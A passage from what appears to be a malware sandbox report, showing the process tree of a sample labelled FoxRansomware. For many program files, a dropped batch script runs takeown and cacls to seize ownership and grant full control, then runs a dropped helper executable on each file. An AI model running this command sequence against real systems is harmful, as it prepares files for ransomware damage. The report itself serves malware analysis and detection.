  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\x8OFcCor.exe
      x8OFcCor.exe -accepteula "ENUtxt.pdf" -nobanner
      4⤵
      Executes dropped EXE
      PID:1964
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\x8OFcCor.exe
    x8OFcCor.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:1088
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\xPOZQ4vb.bat" "C:\Program Files\Java\jdk1.7.0_80\jre\bin\server\classes.jsa""
  2⤵
  - Loads dropped DLL
  PID:608
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Java\jdk1.7.0_80\jre\bin\server\classes.jsa" /E /G Admin:F /C
    3⤵
    PID:1696
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Java\jdk1.7.0_80\jre\bin\server\classes.jsa"
    3⤵
    - Modifies file permissions
    PID:1172
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c x8OFcCor.exe -accepteula "classes.jsa" -nobanner
    3⤵
    - Loads dropped DLL
    PID:992
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\x8OFcCor.exe
      x8OFcCor.exe -accepteula "classes.jsa" -nobanner
      4⤵
      Executes dropped EXE
      PID:1576
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\x8OFcCor.exe
    x8OFcCor.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:1744
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\xPOZQ4vb.bat" "C:\Program Files\Java\jre7\bin\server\classes.jsa""
  2⤵
  - Loads dropped DLL
  PID:1872
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Java\jre7\bin\server\classes.jsa" /E /G Admin:F /C
    3⤵
    PID:1180
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Java\jre7\bin\server\classes.jsa"
    3⤵
    - Modifies file permissions
    PID:1988
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c x8OFcCor.exe -accepteula "classes.jsa" -nobanner
    3⤵
    - Loads dropped DLL
    PID:1700
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\x8OFcCor.exe
      x8OFcCor.exe -accepteula "classes.jsa" -nobanner
      4⤵
      Executes dropped EXE
      PID:1876
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\x8OFcCor.exe
    x8OFcCor.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:616
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\xPOZQ4vb.bat" "C:\Program Files\Microsoft Games\Hearts\HeartsMCE.png""
  2⤵
  - Loads dropped DLL
  PID:1528
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Microsoft Games\Hearts\HeartsMCE.png" /E /G Admin:F /C
    3⤵
    PID:1068
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Microsoft Games\Hearts\HeartsMCE.png"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:1964
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c x8OFcCor.exe -accepteula "HeartsMCE.png" -nobanner
    3⤵
    - Loads dropped DLL
    PID:1628
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\x8OFcCor.exe
      x8OFcCor.exe -accepteula "HeartsMCE.png" -nobanner
      4⤵
      Executes dropped EXE
      PID:1704
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\x8OFcCor.exe
    x8OFcCor.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:576
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\xPOZQ4vb.bat" "C:\Program Files\Microsoft Games\Mahjong\MahjongMCE.png""
  2⤵
  - Loads dropped DLL
  PID:912
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Microsoft Games\Mahjong\MahjongMCE.png" /E /G Admin:F /C
    3⤵
    PID:1160
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Microsoft Games\Mahjong\MahjongMCE.png"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:324
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c x8OFcCor.exe -accepteula "MahjongMCE.png" -nobanner
    3⤵
    - Loads dropped DLL
    PID:2040
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\x8OFcCor.exe
      x8OFcCor.exe -accepteula "MahjongMCE.png" -nobanner
      4⤵
      Executes dropped EXE
      PID:1676
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\x8OFcCor.exe
    x8OFcCor.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:596
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\xPOZQ4vb.bat" "C:\Program Files\Microsoft Games\Purble Place\PurblePlaceMCE.png""
  2⤵
  - Loads dropped DLL
  PID:2036
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Microsoft Games\Purble Place\PurblePlaceMCE.png" /E /G Admin:F /C
    3⤵
    PID:1624
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Microsoft Games\Purble Place\PurblePlaceMCE.png"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:540
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c x8OFcCor.exe -accepteula "PurblePlaceMCE.png" -nobanner
    3⤵
    - Loads dropped DLL
    PID:1308
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\x8OFcCor.exe
      x8OFcCor.exe -accepteula "PurblePlaceMCE.png" -nobanner
      4⤵
      Executes dropped EXE
      PID:1096
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\x8OFcCor.exe
    x8OFcCor.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:1752
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\xPOZQ4vb.bat" "C:\Program Files\Microsoft Games\FreeCell\FreeCellMCE.png""
  2⤵
  - Loads dropped DLL
  PID:1456
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Microsoft Games\FreeCell\FreeCellMCE.png" /E /G Admin:F /C
    3⤵
    PID:1140
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Microsoft Games\FreeCell\FreeCellMCE.png"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:1452
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c x8OFcCor.exe -accepteula "FreeCellMCE.png" -nobanner
    3⤵
    - Loads dropped DLL
    PID:1700
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\x8OFcCor.exe
      x8OFcCor.exe -accepteula "FreeCellMCE.png" -nobanner
      4⤵
      Executes dropped EXE
      PID:1104
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\x8OFcCor.exe
    x8OFcCor.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:1972
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\xPOZQ4vb.bat" "C:\Program Files\Microsoft Games\SpiderSolitaire\SpiderSolitaireMCE.png""
  2⤵
  - Loads dropped DLL
  PID:1868
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Microsoft Games\SpiderSolitaire\SpiderSolitaireMCE.png" /E /G Admin:F /C
    3⤵
    PID:1088
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Microsoft Games\SpiderSolitaire\SpiderSolitaireMCE.png"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:1760
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c x8OFcCor.exe -accepteula "SpiderSolitaireMCE.png" -nobanner
    3⤵
    - Loads dropped DLL
    PID:1628
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\x8OFcCor.exe
      x8OFcCor.exe -accepteula "SpiderSolitaireMCE.png" -nobanner
      4⤵
      Executes dropped EXE
      PID:804
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\x8OFcCor.exe
    x8OFcCor.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:564
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\xPOZQ4vb.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\cryptocme2.sig""
  2⤵
  - Loads dropped DLL
  PID:324
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\cryptocme2.sig" /E /G Admin:F /C
    3⤵
    PID:1184
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\cryptocme2.sig"
    3⤵
    - Modifies file permissions
    PID:1640
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c x8OFcCor.exe -accepteula "cryptocme2.sig" -nobanner
    3⤵
    - Loads dropped DLL
    PID:596
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\x8OFcCor.exe
      x8OFcCor.exe -accepteula "cryptocme2.sig" -nobanner
      4⤵
      Executes dropped EXE
      PID:1696
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\x8OFcCor.exe
    x8OFcCor.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:796
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\xPOZQ4vb.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AMT\AUMProduct.cer""
  2⤵
  - Loads dropped DLL
  PID:1188
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AMT\AUMProduct.cer" /E /G Admin:F /C
    3⤵
    PID:540
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AMT\AUMProduct.cer"
    3⤵
    - Modifies file permissions
    PID:1232
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c x8OFcCor.exe -accepteula "AUMProduct.cer" -nobanner
    3⤵
    - Loads dropped DLL
    PID:1096
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\x8OFcCor.exe
      x8OFcCor.exe -accepteula "AUMProduct.cer" -nobanner
      4⤵
      Executes dropped EXE
      PID:1308
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\x8OFcCor.exe
    x8OFcCor.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:884
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\xPOZQ4vb.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\pmd.cer""
  2⤵
  - Loads dropped DLL
  PID:1820
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\pmd.cer" /E /G Admin:F /C
    3⤵
    PID:1604
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\pmd.cer"
    3⤵
    - Modifies file permissions
    PID:1720
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c x8OFcCor.exe -accepteula "pmd.cer" -nobanner
    3⤵
    - Loads dropped DLL
    PID:1472
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\x8OFcCor.exe
      x8OFcCor.exe -accepteula "pmd.cer" -nobanner
      4⤵
      Executes dropped EXE
      PID:1280
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\x8OFcCor.exe
    x8OFcCor.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:1728
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\xPOZQ4vb.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\email_initiator.gif""
  2⤵
  - Loads dropped DLL
  PID:972
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\email_initiator.gif" /E /G Admin:F /C
    3⤵
    PID:2016
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\email_initiator.gif"
    3⤵
    - Modifies file permissions
    PID:1592
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c x8OFcCor.exe -accepteula "email_initiator.gif" -nobanner
    3⤵
    - Loads dropped DLL
    PID:1808
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\x8OFcCor.exe
      x8OFcCor.exe -accepteula "email_initiator.gif" -nobanner
      4⤵
      Executes dropped EXE
      PID:1736
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\x8OFcCor.exe
    x8OFcCor.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:1580
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\xPOZQ4vb.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\pdf.gif""
  2⤵
  - Loads dropped DLL
  PID:1924
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\pdf.gif" /E /G Admin:F /C
    3⤵
    PID:1528
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\pdf.gif"
    3⤵
    - Modifies file permissions
    PID:1328
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c x8OFcCor.exe -accepteula "pdf.gif" -nobanner
    3⤵
    - Loads dropped DLL
    PID:1964
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\x8OFcCor.exe
      x8OFcCor.exe -accepteula "pdf.gif" -nobanner
      4⤵
      Executes dropped EXE
      PID:1264
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\x8OFcCor.exe
    x8OFcCor.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:1184
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\xPOZQ4vb.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_issue.gif""
  2⤵
  - Loads dropped DLL
  PID:988
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_issue.gif" /E /G Admin:F /C
    3⤵
    PID:1652
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_issue.gif"
    3⤵
    - Modifies file permissions
    PID:808
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c x8OFcCor.exe -accepteula "server_issue.gif" -nobanner
    3⤵
    - Loads dropped DLL
    PID:1676
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\x8OFcCor.exe
      x8OFcCor.exe -accepteula "server_issue.gif" -nobanner
      4⤵
      Executes dropped EXE
      PID:1624
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\x8OFcCor.exe
    x8OFcCor.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:540
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\xPOZQ4vb.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOnNotificationInAcrobat.gif""
  2⤵
  - Loads dropped DLL
  PID:964
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOnNotificationInAcrobat.gif" /E /G Admin:F /C
    3⤵
    PID:816
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOnNotificationInAcrobat.gif"
    3⤵
    - Modifies file permissions
    PID:1072
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c x8OFcCor.exe -accepteula "turnOnNotificationInAcrobat.gif" -nobanner
    3⤵
    - Loads dropped DLL
    PID:944
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\x8OFcCor.exe
      x8OFcCor.exe -accepteula "turnOnNotificationInAcrobat.gif" -nobanner
      4⤵
      Executes dropped EXE
      PID:1920
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\x8OFcCor.exe
    x8OFcCor.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:1604
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\xPOZQ4vb.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd.otf""
  2⤵
  - Loads dropped DLL
  PID:1104
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd.otf" /E /G Admin:F /C
    3⤵
    PID:1700
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd.otf"
    3⤵
    - Modifies file permissions
    PID:908
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c x8OFcCor.exe -accepteula "CourierStd.otf" -nobanner
    3⤵
    - Loads dropped DLL
    PID:1820
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\x8OFcCor.exe
      x8OFcCor.exe -accepteula "CourierStd.otf" -nobanner
      4⤵
      Executes dropped EXE
      PID:1972
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\x8OFcCor.exe
    x8OFcCor.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:2016
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\xPOZQ4vb.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\zx______.pfm""
  2⤵
  - Loads dropped DLL
  PID:1760
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\zx______.pfm" /E /G Admin:F /C
    3⤵
    PID:576
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\zx______.pfm"
    3⤵
    - Modifies file permissions
    PID:1800
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c x8OFcCor.exe -accepteula "zx______.pfm" -nobanner
    3⤵
    - Loads dropped DLL
    PID:1988
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\x8OFcCor.exe
      x8OFcCor.exe -accepteula "zx______.pfm" -nobanner
      4⤵
      Executes dropped EXE
      PID:1628
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\x8OFcCor.exe
    x8OFcCor.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:1528
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\xPOZQ4vb.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_US_POSIX.txt""
  2⤵
  - Loads dropped DLL
  PID:2040
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_US_POSIX.txt" /E /G Admin:F /C
    3⤵
    PID:608
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_US_POSIX.txt"
    3⤵
    - Modifies file permissions
    PID:1956
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c x8OFcCor.exe -accepteula "DisplayLanguageNames.en_US_POSIX.txt" -nobanner
    3⤵
    - Loads dropped DLL
    PID:1484
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\x8OFcCor.exe
      x8OFcCor.exe -accepteula "DisplayLanguageNames.en_US_POSIX.txt" -nobanner
      4⤵
      Executes dropped EXE
      PID:1172
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\x8OFcCor.exe
    x8OFcCor.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:1652
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\xPOZQ4vb.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can32.clx""
  2⤵
  - Loads dropped DLL
  PID:240
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can32.clx" /E /G Admin:F /C
    3⤵
    PID:1500
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can32.clx"
    3⤵
    - Modifies file permissions
    PID:912
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c x8OFcCor.exe -accepteula "can32.clx" -nobanner
    3⤵
    - Loads dropped DLL
    PID:1364
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\x8OFcCor.exe
      x8OFcCor.exe -accepteula "can32.clx" -nobanner
      4⤵
      Executes dropped EXE
      PID:1648
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\x8OFcCor.exe
    x8OFcCor.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:816
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\xPOZQ4vb.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\symbol.txt""
  2⤵
  - Loads dropped DLL
  PID:1788
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\symbol.txt" /E /G Admin:F /C
    3⤵
    PID:1720
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\symbol.txt"
    3⤵
    - Modifies file permissions
    PID:1096
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c x8OFcCor.exe -accepteula "symbol.txt" -nobanner
    3⤵
    - Loads dropped DLL
    PID:1308
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\x8OFcCor.exe
      x8OFcCor.exe -accepteula "symbol.txt" -nobanner
      4⤵
      Executes dropped EXE
      PID:964
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\x8OFcCor.exe
    x8OFcCor.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:1728
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\xPOZQ4vb.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\SYMBOL.TXT""
  2⤵
  - Loads dropped DLL
  PID:908
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\SYMBOL.TXT" /E /G Admin:F /C
    3⤵
    PID:1592
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\SYMBOL.TXT"
    3⤵
    - Modifies file permissions
    PID:1312
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c x8OFcCor.exe -accepteula "SYMBOL.TXT" -nobanner
    3⤵
    - Loads dropped DLL
    PID:1104
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\x8OFcCor.exe
      x8OFcCor.exe -accepteula "SYMBOL.TXT" -nobanner
      4⤵
      Executes dropped EXE
      PID:1280
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\x8OFcCor.exe
    x8OFcCor.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:1352
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\xPOZQ4vb.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\email_all.gif""
  2⤵
  - Loads dropped DLL
  PID:1800
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\email_all.gif" /E /G Admin:F /C
    3⤵
    PID:1328
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\email_all.gif"
    3⤵
    - Modifies file permissions
    PID:1808
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c x8OFcCor.exe -accepteula "email_all.gif" -nobanner
    3⤵
    - Loads dropped DLL
    PID:1704
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\x8OFcCor.exe
      x8OFcCor.exe -accepteula "email_all.gif" -nobanner
      4⤵
      Executes dropped EXE
      PID:1736
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\x8OFcCor.exe
    x8OFcCor.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:1184
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\xPOZQ4vb.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\open_original_form.gif""
  2⤵
  - Loads dropped DLL
  PID:1956
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\open_original_form.gif" /E /G Admin:F /C
    3⤵
    PID:808
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\open_original_form.gif"
    3⤵
    - Modifies file permissions
    PID:1964
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c x8OFcCor.exe -accepteula "open_original_form.gif" -nobanner
    3⤵
    - Loads dropped DLL
    PID:2040
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\x8OFcCor.exe
      x8OFcCor.exe -accepteula "open_original_form.gif" -nobanner
      4⤵
      Executes dropped EXE
      PID:1264
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\x8OFcCor.exe
    x8OFcCor.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:596
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\xPOZQ4vb.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\rss.gif""
  2⤵
  - Loads dropped DLL
  PID:912
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\rss.gif" /E /G Admin:F /C
    3⤵
    PID:1072
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\rss.gif"
    3⤵
    - Modifies file permissions
    PID:1676
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c x8OFcCor.exe -accepteula "rss.gif" -nobanner
    3⤵
    - Loads dropped DLL
    PID:240
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\x8OFcCor.exe
      x8OFcCor.exe -accepteula "rss.gif" -nobanner
      4⤵
      Executes dropped EXE
      PID:1624
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\x8OFcCor.exe
    x8OFcCor.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:1452
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\xPOZQ4vb.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOffNotificationInTray.gif""
  2⤵
  - Loads dropped DLL
  PID:1096
- - C:\Windows\SysWOW64\cacls.exe
